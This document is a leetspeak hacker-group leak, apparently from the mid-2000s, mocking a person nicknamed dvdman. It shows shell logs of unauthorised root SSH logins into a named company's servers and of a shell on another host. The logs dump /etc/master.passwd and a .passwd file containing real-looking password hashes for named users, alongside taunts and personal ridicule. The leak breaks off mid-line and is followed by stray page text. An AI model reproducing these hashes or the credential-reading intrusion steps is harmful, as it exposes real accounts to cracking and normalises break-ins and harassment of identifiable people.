-rw------- 1 johnh free 176 Jun 28 21:53 showtime.log
-rw------- 1 johnh free 201 Jun 26 15:27 superjesus.log
-rw------- 1 johnh free 3974 Jun 27 03:01 topcon.log

n0t1c3 h0w dvdman l0gz h1z ch4tz.. s0undz l1k3 s0m3th1ng 4 n4rc w0uld d0!

-~-~-~

n0w 1t'z 4 w3ll kn0wn f4ct th4t dvdman 1z d33p 1n th3 sc3n3. h3
3v3n h4z a sh3ll 0n th3 w0rld r3n0wn undef.net!

-~-~-~

-bash-3.00# ssh john@undef.net
--------------------------------------------------------------
WARNING: PLEASE READ
--------------------------------------------------------------
UNAUTHORIZED ACCESS IS PROHIBITED.

(a) All access to, and activities on this system that are not
explicitly authorized by Greg Albrecht are considered
unauthorized.
(b) All access to, and activities on this system are logged.
(c) Unauthorized access to, and activities on this system will
be reported to the appropriate authorities.
--------------------------------------------------------------
Welcome to juanita.undef.net

Password:
$ w
9:25AM up 6:41, 2 users, load averages: 0.35, 0.35, 0.35
USER TTY FROM LOGIN@ IDLE WHAT
xty p3 63.130.185.162 6:34AM 2:51 -
xty p4 63.130.185.162 6:35AM 2:33 -
$ ls -al
total 3218
drwxr-xr-x 14 john john 1024 Jul 19 13:29 .
drwxr-xr-x 35 root wheel 2048 May 16 15:58 ..
drwx------ 5 john john 512 Jan 17 2005 .BitchX
lrwxrwxrwx 1 john john 9 Jul 14 2005 .bash_history -> /dev/null
-rw-r----- 1 john john 63 Dec 31 2004 .bash_logout
-rw-r----- 1 john john 216 Dec 31 2004 .bash_profile
-rw-r----- 1 john john 131 Dec 31 2004 .bashrc
-rw-r--r-- 1 john john 771 Dec 31 2004 .cshrc
lrwxrwxrwx 1 john john 9 Jul 14 2005 .forward -> /dev/null
drwx------ 2 john john 512 Jan 10 2005 .irssi
-rw-r--r-- 1 john john 7 Jun 12 01:35 .ispoof
-rw-r--r-- 1 john john 255 Dec 31 2004 .login
-rw-r--r-- 1 john john 165 Dec 31 2004 .login_conf
-rw------- 1 john john 371 Dec 31 2004 .mail_aliases
-rw-r--r-- 1 john john 331 Dec 31 2004 .mailrc
-rw-r--r-- 1 john john 26 Jun 12 01:35 .oidentd.conf
-rw-r--r-- 1 john john 801 Dec 31 2004 .profile
-rw------- 1 john john 276 Dec 31 2004 .rhosts
-rw-r----- 1 john john 3394 Dec 31 2004 .screenrc
lrwxrwxrwx 1 john john 9 Jul 14 2005 .sh_history -> /dev/null
lrwxrwxrwx 1 john john 9 Jul 14 2005 .shosts -> /dev/null
-rw-r--r-- 1 john john 852 Dec 31 2004 .shrc
drwx------ 4 john john 512 Jan 6 2005 .silc
drwx------ 2 john john 512 Feb 7 2005 .ssh
drwxr-xr-x 12 john john 1024 Jan 17 2005 BitchX
drwx------ 6 john john 512 Jun 9 08:04 Maildir
drwxr-xr-x 2 john john 512 Jan 17 2005 bin
drwxr-xr-x 2 john john 1024 Jun 2 06:51 bnc2.9.4
-rw-r--r-- 1 john john 76896 Feb 6 2005 bnc2.9.4.tar.gz
drwx------ 10 john john 512 Jan 2 2005 cyp
-rw-r--r-- 1 john john 68742 Jun 30 2003 cyp1.0k.tar.gz
-rw-r--r-- 1 john john 2532476 Mar 26 2004 ircii-pana-1.1-final.tar.gz
drwx-----x 3 john john 512 Jul 20 12:41 my_webpage
-rw-r--r-- 1 john john 179227 Jul 19 13:29 p
-rw-r--r-- 1 john john 312224 Jun 24 2004 psyBNC2.3.1.tar.gz
drwxr-xr-x 11 john john 512 Jun 13 08:09 psybnc
lrwxrwxrwx 1 john john 10 Jul 14 2005 public_html -> my_webpage
-rwxr-xr-x 1 john john 5178 Feb 3 2005 test
-rw-r--r-- 1 john john 115 Feb 3 2005 test.c
drwxr-xr-x 4 john john 512 Jul 20 12:41 ul
$ id
uid=1056(john) gid=1056(john) groups=1056(john)

y3z dvdman.. w3 g0t y0ur stup1d fuqn ip f1nd3r w4r3z.
(xt w0rkz w1th dvdman!!! th31r r3l4t10nsh1p m4y bl0ss0m 1nt0 s0m3th1ng m0r3..
k33p y0ur 3y3z p33l3d!@#)

-~-~-~

s0m3h0w dvdman g0t h1r3d by bangbros. 1f th3y 3v3n th1nk 4b0ut g1v1ng h1m a
g00d r3f3r3nc3 th3y w1ll b3 rm'd.

[root@hackerz.org]# ssh -l root 64.111.193.9
The authenticity of host '64.111.193.9 (64.111.193.9)' can't be established.
RSA key fingerprint is d7:d8:44:e6:70:39:40:c4:49:15:c3:6e:25:2c:af:6b.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '64.111.193.9' (RSA) to the list of known hosts.
root@64.111.193.9's password:
Last login: Tue Jul 19 10:07:48 2005
FreeBSD 5.3-RELEASE (GENERIC) #0: Fri Nov 5 04:19:18 UTC 2004

Welcome to FreeBSD!

Before seeking technical support, please use the following resources:

o Security advisories and updated errata information for all releases are
at http://www.FreeBSD.org/releases/ - always consult the ERRATA section
for your release first as it's updated frequently.

o The Handbook and FAQ documents are at http://www.FreeBSD.org/ and,
along with the mailing lists, can be searched by going to
http://www.FreeBSD.org/search/. If the doc distribution has
been installed, they're also available formatted in /usr/share/doc.

If you still have a question or problem, please take the output of
`uname -a', along with any relevant error messages, and email it
as a question to the questions@FreeBSD.org mailing list. If you are
unfamiliar with FreeBSD's directory layout, please refer to the hier(7)
manual page. If you are not familiar with manual pages, type `man man'.

You may also use sysinstall(8) to re-enter the installation and
configuration utility. Edit /etc/motd to change this login announcement.

%w
3:26AM up 67 days, 13:16, 1 user, load averages: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE WHAT
johnh p0 paysite 04Nov05 4days bash
%cat /etc/master.passwd

# $FreeBSD: src/etc/master.passwd,v 1.39 2004/08/01 21:33:47 markm Exp $
#
root:$1$t/M3s1qW$qN9jZIr8RNqXqdCw/WrK9.:0:0::0:0:Charlie &:/root:/bin/csh
toor:*:0:0::0:0:Bourne-again Superuser:/root:
daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5::0:0:System &:/:/usr/sbin/nologin
bin:*:3:7::0:0:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533::0:0:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533::0:0:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13::0:0:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8::0:0:News Subsystem:/:/usr/sbin/nologin
man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25::0:0:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26::0:0:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53::0:0:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62::0:0:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64::0:0:pflogd privsep user:/var/empty:/usr/sbin/nologin
uucp:*:66:66::0:0:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6::0:0:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/nologin
johnh:$1$P6.VYjXW$C1a25LaiPL6RwMRAJygaM0:1001:1001::0:0:John H:/home/johnh:/usr/local/bin/bash
gus:$1$84nQ7mp0$vCet0Ft4spM2m375KWIWD/:1002:1002::0:0:Gustavo:/home/gus:/usr/local/bin/bash
faccundo:$1$496JBQc0$ueeV1pV4T3o29eAL1C48p0:1003:1003::0:0:faccundo:/home/faccundo:/usr/local/bin/bash
%cd /home/johnh
%ls -al
total 716
drwxr-xr-x 4 johnh johnh 512 Oct 31 12:07 .
drwxr-xr-x 5 root wheel 512 Aug 8 11:52 ..
-rw------- 1 johnh johnh 3832 Nov 19 14:12 .bash_history
-rw-r--r-- 1 johnh johnh 767 Mar 25 2005 .cshrc
-rw-r--r-- 1 johnh johnh 248 Mar 25 2005 .login
-rw-r--r-- 1 johnh johnh 158 Mar 25 2005 .login_conf
-rw------- 1 johnh johnh 373 Mar 25 2005 .mail_aliases
-rw-r--r-- 1 johnh johnh 331 Mar 25 2005 .mailrc
-rw-r--r-- 1 johnh johnh 797 Mar 25 2005 .profile
-rw------- 1 johnh johnh 276 Mar 25 2005 .rhosts
-rw-r--r-- 1 johnh johnh 975 Mar 25 2005 .shrc
drwxr-xr-x 2 johnh johnh 512 Oct 26 16:18 .ssh
-rwxr-xr-x 1 johnh johnh 4955 Oct 27 21:47 a
-rw-r--r-- 1 johnh johnh 173 Oct 27 21:47 a.c
-rw------- 1 johnh johnh 299008 Oct 27 21:47 a.core
-rw-r--r-- 1 root johnh 117 Jun 3 2005 blah.sh
drwxr-xr-x 2 root johnh 512 Oct 31 12:07 debug
%uname -a
FreeBSD backup.bangbros.com 5.3-RELEASE FreeBSD 5.3-RELEASE #0: Fri Nov 5 04:19:18 UTC 2004 root@harlow.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386
%ssh -l root 64.111.193.12

root@64.111.193.12's password:
Last login: Tue Jun 21 20:42:23 2005

FreeBSD 5.3-RELEASE (GENERIC) #0: Fri Nov 5 04:19:18 UTC 2004

Welcome to FreeBSD!

Before seeking technical support, please use the following resources:

o Security advisories and updated errata information for all releases are
at http://www.FreeBSD.org/releases/ - always consult the ERRATA section
for your release first as it's updated frequently.

o The Handbook and FAQ documents are at http://www.FreeBSD.org/ and,
along with the mailing lists, can be searched by going to
http://www.FreeBSD.org/search/. If the doc distribution has
been installed, they're also available formatted in /usr/share/doc.

If you still have a question or problem, please take the output of
`uname -a', along with any relevant error messages, and email it
as a question to the questions@FreeBSD.org mailing list. If you are
unfamiliar with FreeBSD's directory layout, please refer to the hier(7)
manual page. If you are not familiar with manual pages, type `man man'.

You may also use sysinstall(8) to re-enter the installation and
configuration utility. Edit /etc/motd to change this login announcement.

%uname -a
FreeBSD 2257i.bangbros.com 5.3-RELEASE FreeBSD 5.3-RELEASE #0: Fri Nov 5 04:19:18 UTC 2004 root@harlow.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386
%cat /etc/master.mpasswd

# $FreeBSD: src/etc/master.passwd,v 1.39 2004/08/01 21:33:47 markm Exp $
#
root:$1$nXG05sKx$oZZfgRYYgs4K5aFLLt/es.:0:0::0:0:Charlie &:/root:/bin/csh
toor:*:0:0::0:0:Bourne-again Superuser:/root:
daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5::0:0:System &:/:/usr/sbin/nologin
bin:*:3:7::0:0:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533::0:0:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533::0:0:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13::0:0:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8::0:0:News Subsystem:/:/usr/sbin/nologin
man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25::0:0:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26::0:0:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53::0:0:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62::0:0:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64::0:0:pflogd privsep user:/var/empty:/usr/sbin/nologin
uucp:*:66:66::0:0:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6::0:0:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/nologin
johnh:$1$m1mMZ37N$2UdA4ThopQzCNuyWhapGn1:1001:1001::0:0:John:/home/johnh:/bin/sh
mysql:*:88:88::0:0:MySQL Daemon:/nonexistent:/sbin/nologin
bbros2257:$1$mEii.TPy$ecXpN9WvsIBqUJYXb4QSs/:1002:1002::0:0:bangbros 2257:/home/bbros2257:/usr/local/bin/bash
%cd /home/johnh
%ls -al
total 128
drwxr-xr-x 4 johnh johnh 512 Sep 30 11:35 .
drwxr-xr-x 4 root wheel 512 Jun 10 2005 ..
-rw------- 1 johnh johnh 135 Sep 28 18:05 .bash_history
-rw-r--r-- 1 johnh johnh 767 Jun 10 2005 .cshrc
-rw-r--r-- 1 johnh johnh 248 Jun 10 2005 .login
-rw-r--r-- 1 johnh johnh 158 Jun 10 2005 .login_conf
-rw------- 1 johnh johnh 373 Jun 10 2005 .mail_aliases
-rw-r--r-- 1 johnh johnh 331 Jun 10 2005 .mailrc
-rw-r--r-- 1 johnh johnh 797 Jun 10 2005 .profile
-rw------- 1 johnh johnh 276 Jun 10 2005 .rhosts
-rw-r--r-- 1 johnh johnh 975 Jun 10 2005 .shrc
drwx------ 2 johnh johnh 512 Jun 10 2005 .ssh
-rwxr-xr-x 1 johnh johnh 38462 Sep 30 11:06 php.ini
drwxrwxrwx 3 root johnh 512 Sep 30 12:09 public_html
%exit
logout
Connection to 64.111.193.12 closed.
%exit
logout
Connection to 64.111.193.9 closed.


pr3tty funny h0w dvdman w4z th3 r34s0n bangbros g0t 0wn3d..
h1m b31ng th3 s3cur1ty 4dm1n & 4ll.

-~-~-~

$ uname -a
FreeBSD John.Bangbros.com 5.3-RELEASE FreeBSD 5.3-RELEASE #0: Mon Jun 6 13:27:56 EDT 2005 root@John.Bangbros.com:/usr/obj/usr/src/sys/DUMMYNET i386
$ id
uid=1004(dvdman) gid=1004(dvdman) groups=1004(dvdman)
$ ls -al
total 384
drwxr-xr-x 8 dvdman dvdman 512 Aug 30 09:33 .
drwxr-xr-x 11 root wheel 512 Jul 14 11:54 ..
drwx------ 3 dvdman dvdman 512 Apr 5 2005 .BitchX
-rw------- 1 dvdman dvdman 5647 Nov 17 13:42 .bash_history
-rw-r--r-- 1 dvdman dvdman 767 Mar 30 2005 .cshrc
-rw-r--r-- 1 dvdman dvdman 5 Dec 28 11:14 .ispoof
-rw-r--r-- 1 dvdman dvdman 248 Mar 30 2005 .login
-rw-r--r-- 1 dvdman dvdman 158 Mar 30 2005 .login_conf
-rw------- 1 dvdman dvdman 373 Mar 30 2005 .mail_aliases
-rw-r--r-- 1 dvdman dvdman 331 Mar 30 2005 .mailrc
-rw------- 1 dvdman dvdman 2763 Sep 1 13:35 .mysql_history
-rw-r--r-- 1 dvdman dvdman 24 Dec 28 11:14 .oidentd.conf
-rw-r--r-- 1 root dvdman 103 Aug 30 15:29 .passwd
-rw-r--r-- 1 dvdman dvdman 797 Mar 30 2005 .profile
-rw------- 1 dvdman dvdman 276 Mar 30 2005 .rhosts
-rw-r--r-- 1 dvdman dvdman 975 Mar 30 2005 .shrc
drwx------ 2 dvdman dvdman 512 Jul 9 14:54 .ssh
drwxr-xr-x 2 dvdman dvdman 512 Aug 24 14:54 logs
-rw-r--r-- 1 dvdman dvdman 312224 Jun 24 2004 psyBNC2.3.1.tar.gz
drwxr-xr-x 11 dvdman dvdman 512 Jul 11 14:16 psybnc
drwxr-xr-x 3 dvdman dvdman 512 Jun 30 2005 psybnc-spoof
drwxr-xr-x 8 dvdman dvdman 1024 Dec 8 13:43 public_html
$ cat .passwd
johnh:jGNBUNbheu.hM
flatline:9YJnrb8rqva/M
elesha:O79xM1OkQgqtk
duck:K6145zM08.5EM
kevin:cfBzVeHe4j/OQ

plz n0t3, john.bangbros.com was l33tsecurity.com unt1l dvdman w4z f1r3d.
4ls0 n0t3 th4t h0no d1d n0t t0uch bangbros. w3 l0v3 p0rn. d0nt hurt th3
p0rn!

-~-~-~

%ssh paysite.bangbros.com -l johnh

Password:
Last login: Sun Jan 1 08:49:49 2006

Copyright (c) 1980, 1983, 1986, 1988, 1990, 1991, 1993, 1994
The Regents of the University of California. All rights reserved.

FreeBSD 4.8-RELEASE (GENERIC) #0: Thu Apr 3 10:53:38 GMT 2003

Welcome to FreeBSD!

Before seeking technical support, please use the following resources:

o Security advisories and updated errata information for all releases are
at http://www.FreeBSD.org/releases/ - always consult the ERRATA section
for your release first as it's updated frequently.

o The Handbook and FAQ documents are at http://www.FreeBSD.org/ and,
along with the mailing lists, can be searched by going to
http://www.FreeBSD.org/search/. If the doc distribution has
been installed, they're also available formatted in /usr/share/doc.

If you still have a question or problem, please take the output of
`uname -a', along with any relevant error messages, and email it
as a question to the questions@FreeBSD.org mailing list. If you are
unfamiliar with FreeBSD's directory layout, please refer to the hier(7)
man page. If you are not familiar with man pages, type `man man'.

You may also use /stand/sysinstall to re-enter the installation and
configuration utility. Edit /etc/motd to change this login announcement.

-bash-2.05b$ sudo cat /etc/master.passwd
# $FreeBSD: src/etc/master.passwd,v 1.25.2.6 2002/06/30 17:57:17 des Exp $
#
root:$1$SfL/0Uq8$E.Fop5NEh96mT0.hBZH4Q0:0:0::0:0:Charlie &:/root:/usr/local/bin/bash
toor:*:0:0::0:0:Bourne-again Superuser:/root:
daemon:*:1:1::0:0:Owner of many system processes:/root:/sbin/nologin
operator:*:2:5::0:0:System &:/:/sbin/nologin
bin:*:3:7::0:0:Binaries Commands and Source:/:/sbin/nologin
tty:*:4:65533::0:0:Tty Sandbox:/:/sbin/nologin
kmem:*:5:65533::0:0:KMem Sandbox:/:/sbin/nologin
games:*:7:13::0:0:Games pseudo-user:/usr/games:/sbin/nologin
news:*:8:8::0:0:News Subsystem:/:/sbin/nologin
man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/sbin/nologin
sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/sbin/nologin
smmsp:*:25:25::0:0:Sendmail Submission User:/var/spool/clientmqueue:/sbin/nologin
mailnull:*:26:26::0:0:Sendmail Default User:/var/spool/mqueue:/sbin/nologin
bind:*:53:53::0:0:Bind Sandbox:/:/sbin/nologin
uucp:*:66:66::0:0:UUCP pseudo-user:/var/spool/uucppublic:/usr/libexec/uucp/uucico
xten:*:67:67::0:0:X-10 daemon:/usr/local/xten:/sbin/nologin
pop:*:68:6::0:0:Post Office Owner:/nonexistent:/sbin/nologin
www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/sbin/nologin
nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/sbin/nologin
josh:$1$wLtfxD/T$XhYx.u4qVXlJh940I7/u2/:1003:1003::0:0:Josh:/home/josh:/usr/local/bin/bash
bangbros:$1$QNtXkAf7$fkEEnymX.iMzCKJfnUvyX1:501:501::0:0:BangBros.com, Inc.:/home/bangbros:/usr/local/bin/bash
mysql:*:88:88::0:0:MySQL Daemon:/var/db/mysql:/sbin/nologin
johnh:t0qR

← previous
1
guest's profile picture
1 Mar 2023
Консультация психолога
loading
sending ...
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you accept the Terms of Service and Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OKREJECT